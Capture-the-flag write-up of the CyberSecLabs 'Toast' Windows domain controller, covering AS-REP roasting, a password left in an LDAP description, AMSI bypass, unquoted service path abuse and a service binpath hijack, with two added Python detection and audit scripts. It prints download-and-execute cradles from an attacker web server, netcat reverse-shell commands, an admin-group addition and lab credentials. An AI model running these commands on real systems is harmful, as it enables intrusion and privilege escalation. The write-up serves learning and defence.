# CRTP Series | CyberSecLabs : Toast Write-up
Updated: Nov 10, 2021
This is the first post in a series of write-ups on vulnerable machines I will be publishing in preparation for the CRTP exam.
You can access my Gitbook repository here for all the commands.
First we run an nmap scan to see which ports are open and the services running on them.
-Pn : Skip host discovery [Don't ping]
-p- : Scan all 65535 ports
-oA : Save output to file
Let's run an aggressive nmap scan to enumerate the services on all open ports.
-A : Enable OS detection, version detection, script scanning, and traceroute
Looking at ports 389 (LDAP) and 88 (Kerberos), our target is likely a Domain Controller.
Domain Name : Toast.csl | Hostname: TOAST-DC
The SMB service stands out from all the services, and that's where we'll start poking.
We have anonymous read access on 2 shares, but nothing useful in there.
Interestingly, we now have 2 usernames:
If we did not know these, we could enumerate valid users using GetNPUsers.py from impacket with a username wordlist from SecLists.
Let's see if any of the users have Kerberos pre-authentication disabled. If so, we can grab that user's crackable AS-REP and brute-force it offline.
Let's take a deeper look at how this attack works.
If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled, i.e. Kerberos pre-auth is disabled, it is possible to grab the user's crackable AS-REP and brute-force it offline.
With sufficient rights over the account (GenericWrite or GenericAll), Kerberos pre-auth can be forcibly disabled as well.
[AS-REQ] With pre-auth enabled, a timestamp encrypted with the user's NTLM hash is sent to the KDC, so the KDC knows the request came from that specific user. With pre-auth disabled, this proof is not required, and anyone can send the AS-REQ on the user's behalf.
[AS-REP] The KDC creates an encrypted TGT. The reply also contains additional material encrypted with the user's NTLM hash.
The attacker grabs the AS-REP and cracks the user's password (NTLM hash) offline.
Reference: Harmjoy's blog
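From the defender's side, the attack above leaves a trace on the DC: Security event 4768 (TGT requested) with Pre-Authentication Type 0 and an RC4 (0x17) ticket encryption type, which is what GetNPUsers.py provokes for a DONT_REQ_PREAUTH account. The detection below is an added example, not code from the write-up; the flattened key=value log lines are constructed, and the IP addresses other than the DC's are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample lines (not real exported events) in a flattened key=value
# form. Security event 4768 is "A Kerberos authentication ticket (TGT) was requested".
SAMPLE_4768_LOG = """\
EventID=4768 TargetUserName=potato ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 IpAddress=172.31.3.20
EventID=4768 TargetUserName=karen ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=0 IpAddress=172.31.3.99
EventID=4768 TargetUserName=TOAST-DC$ ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 IpAddress=172.31.3.8
EventID=4769 TargetUserName=karen ServiceName=cifs/TOAST-DC TicketEncryptionType=0x17 PreAuthType=- IpAddress=172.31.3.99
"""

NO_PREAUTH = "0"    # Pre-Authentication Type 0: logon without pre-authentication
RC4_HMAC = "0x17"   # etype 23, the AS-REP format john cracks in the write-up


def parse_event(line: str) -> Dict[str, str]:
    """Turn one flattened 'key=value ...' line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_asrep_roast(ev: Dict[str, str]) -> bool:
    """A TGT request that needed no pre-auth and was answered with RC4 is
    exactly what an AS-REP roasting request for a DONT_REQ_PREAUTH account looks like."""
    return (ev.get("EventID") == "4768"
            and ev.get("ServiceName") == "krbtgt"
            and ev.get("PreAuthType") == NO_PREAUTH
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC)


def find_asrep_roasting(log: str) -> List[Dict[str, str]]:
    """Return every matching event in the log, in order."""
    return [ev for ev in map(parse_event, log.splitlines()) if is_asrep_roast(ev)]


def targets_by_source(hits: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group flagged accounts by requesting IP: several distinct targets from one
    address point at a username wordlist run rather than a single known user."""
    grouped = defaultdict(list)
    for ev in hits:
        grouped[ev["IpAddress"]].append(ev["TargetUserName"])
    return dict(grouped)


if __name__ == "__main__":
    for ip, users in targets_by_source(find_asrep_roasting(SAMPLE_4768_LOG)).items():
        print(f"{ip}: AS-REP without pre-auth for {', '.join(users)}")
```

The fix on the account side is to clear the "Do not require Kerberos preauthentication" flag and set a strong password; restricting the account to AES encryption types also removes the RC4 AS-REP that makes offline cracking cheap.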
Using GetNPUsers.py from impacket we were able to identify that user 'Karen' has Kerberos pre-auth disabled. The AS-REP is stored in a format readable by john. Crack it with rockyou.txt as the wordlist.
Great, we've owned user Karen!
Remember that LDAP (port 389) was open. Let's manually enumerate LDAP as user Karen.
First we need to identify the naming context. Let's use python3.
Next, let's grab the "Description" attribute of all objects. Why, you ask? Administrators are known to save passwords in the "Description" of an object, especially for roles with double shifts where different users share a password, apparently unaware that anyone with LDAP read access, bad actors included, can see them.
Looks like we've got user Potato's credentials! Let's revisit enumeration of shares with Potato's privileges.
We have READ/WRITE access on the Potato share.
ClearLogs.ps1 appears to be run by a scheduled job (cronjob-style) every minute.
We could possibly replace its contents to get a reverse shell from the target.
The traditional methods of gaining a foothold, running Invoke-PowerShellTcp.ps1 directly or delivering the payload over SMB, do not work. Although we can observe the target's requests to our web server, we do not get a shell, as Defender and AMSI seem to be causing problems.
Additionally we'll need to obfuscate the bypass code using ISESteroids.
Obfuscation of AMSI Bypass
1. To install ISESteroids, run this in Powershell:
Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery -Force
2. Start a Powershell ISE Editor and run:
3. Copy the AMSI Bypass code to the editor and obfuscate the code.
4. Save the output as amsibypass.ps1
Download Invoke-PowerShellTcp.ps1 and append to its end:
Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port No>
Copy both scripts to a folder and host it on a web server.
python -m SimpleHTTPServer
Let's replace ClearLogs.ps1 with the below content:
IEX(iwr http://<IP>/amsibypass.ps1 -UseBasicParsing); IEX(iwr http://<IP>/Invoke-PowerShellTcp.ps1 -UseBasicParsing);
Copy it to the Potato Share by logging into SMB:
smbclient \\\\172.31.3.8\\Potato -U "Potato"%"W2CUvphqXB" -c "put ClearLogs.ps1"
The idea is to get the scheduled job to download both scripts and execute them in memory. Soon enough, we get a callback, followed by a reverse shell!
To get a more stable shell, I downloaded netcat onto the target to create a new shell.
We've got our first flag!
To automate the Local Windows Privilege Escalation checklist, download and execute winPEAS on the target. Right away we observe a red flag: there is a misconfigured service, 'HellEscape', with an Unquoted Service Path. We check whether we have permission to restart 'HellEscape' using the Service Control utility (sc), and sure enough we do!
Let's take a deeper look at how this local privilege escalation attack works:
Unquoted Service Path Abuse
Services in Windows have a binPath (binary path) which contains the command the service runs when it starts. If we use the sc utility to display the config of a service, among other information we get the BINARY_PATH_NAME.
Weird stuff can happen if the BINARY_PATH_NAME is not quoted.
Executables can take arguments, generally separated by spaces, and executables can be referenced by their absolute paths. Paths can also contain spaces. Let's understand how Windows interprets unquoted service paths.
Target a service which:
- has a space in its path and no quotes around it;
- has a folder along that path in which we have write permissions;
- we have permission to restart;
- runs with elevated privileges.
In this case, when 'HellEscape' is started, the system tries to interpret the possibilities in the following order:
c:\Program Files\Purgatory\Up For.exe and so on..
If an attacker is able to place a malicious executable at one of these unexpected paths, they gain the privileges of the user running the service.
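The lookup order just described can be computed from a service's BINARY_PATH_NAME, which is what an audit script (or winPEAS) does before checking whether any of the intermediate directories is writable by non-admins. The code below is an added example, not part of the write-up; HellEscape's path is assumed to be the one shown above, and the two other services in the sample are made up.

```python
import ntpath
from typing import List, Tuple

# Constructed sample of 'sc qc' style data as (service, BINARY_PATH_NAME, account).
# HellEscape's path is assumed from the write-up; the other two entries are made up.
SAMPLE_SERVICES: List[Tuple[str, str, str]] = [
    ("HellEscape", r"c:\Program Files\Purgatory\Up For.exe", r"toast\Serviceuser"),
    ("QuotedSvc", r'"C:\Program Files\Example App\svc.exe" -k netsvcs', "LocalSystem"),
    ("NoSpaceSvc", r"C:\Windows\System32\example.exe -verbose", "LocalSystem"),
]


def candidate_binaries(bin_path: str) -> List[str]:
    """Image paths Windows tries, in order, for a service's BINARY_PATH_NAME.
    A quoted path has exactly one candidate. For an unquoted path with spaces,
    every prefix ending at a space is tried as '<prefix>.exe' before the real one."""
    p = bin_path.strip()
    if p.startswith('"'):
        return [p[1:p.index('"', 1)]]
    tokens = p.split(" ")
    # the image name ends at the first token carrying .exe; later tokens are arguments
    end = next((i for i, t in enumerate(tokens) if t.lower().endswith(".exe")), len(tokens) - 1)
    image = tokens[: end + 1]
    return [" ".join(image[:i]) + ".exe" for i in range(1, len(image))] + [" ".join(image)]


def quoted_fix(bin_path: str) -> str:
    """The remediation: wrap the image path in quotes and keep any arguments."""
    p = bin_path.strip()
    if p.startswith('"'):
        return p
    image = candidate_binaries(p)[-1]
    return f'"{image}"{p[len(image):]}'


def audit_services(services: List[Tuple[str, str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Report unquoted paths with spaces: the service, the account it runs as and the
    directories where a stray '<prefix>.exe' would be picked up (check those for write
    access by non-admin users; 'c:\\' itself is normally safe, the deeper ones often not)."""
    findings = []
    for name, bin_path, account in services:
        cands = candidate_binaries(bin_path)
        if len(cands) > 1:
            findings.append((name, account, sorted({ntpath.dirname(c) for c in cands[:-1]})))
    return findings


if __name__ == "__main__":
    for name, account, dirs in audit_services(SAMPLE_SERVICES):
        print(f"{name} (runs as {account}): check write access on {dirs}")
        print(f"  fix: sc config {name} binPath= {quoted_fix(SAMPLE_SERVICES[0][1])}")
```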
Now that we've got that covered, let's generate a reverse shell payload, rename it to 'Up.exe' and place it in the writable directory: c:\Program Files\Purgatory\Up.exe
Like before, we will need to bypass AMSI using amsibypass.ps1 before running the malicious executable. To keep things simple, I've compiled Clearlogs.ps1 into an exe using PS2EXE.
# Clearlogs.ps1
IEX(iwr http://<IP>/amsibypass.ps1 -UseBasicParsing); IEX(iwr http://<IP>/Invoke-PowerShellTcp.ps1 -UseBasicParsing);
Remember to make the necessary port number changes within Invoke-PowerShellTcp.ps1.
'HellEscape' runs with privileges of 'Serviceuser'.
We have write permissions in the required directory as well as permission to restart the service, which is all we need to exploit the Unquoted Service Path misconfiguration.
Compile Clearlogs.ps1 into script.exe
Transfer it over to the writable directory as:
Set up a listener using netcat.
Start 'HellEscape' using sc.
As you can see above, I've used netcat again to get a more stable shell. We now have privileges of Serviceuser!
Once again, I've used winPEAS to see what's in store for us as 'Serviceuser'.
We can see that the service 'UsoSvc' is affected by a security misconfiguration. We have Full Access on its binary path and it runs as LocalSystem (admin privileges). What does this mean? We can reconfigure the BINARY_PATH_NAME to run any command or binary of our choosing when 'UsoSvc' is started. Ideal for elevating privileges. For example:
Add our user to the Administrator's group :
net localgroup administrators toast\Serviceuser /add
Get a reverse shell:
c:\<Directory>\nc.exe <IP> <port no> -e c:\Windows\system32\cmd.exe
Let's use the reverse shell method to elevate privileges to SYSTEM. We can use sc to modify the binpath and restart the service.
The System Flag is ours.
Valid usernames were enumerated.
User Karen had Kerberos pre-authentication disabled and a weak password configured. This enabled us to grab the AS-REP and crack the hash offline.
User Potato's password was exposed in the object's 'Description' attribute.
The service 'HellEscape' was misconfigured with an Unquoted Service Path, which allowed us to obtain Serviceuser's privileges.
The service 'UsoSvc' had misconfigured permissions, which allowed us to elevate to LocalSystem.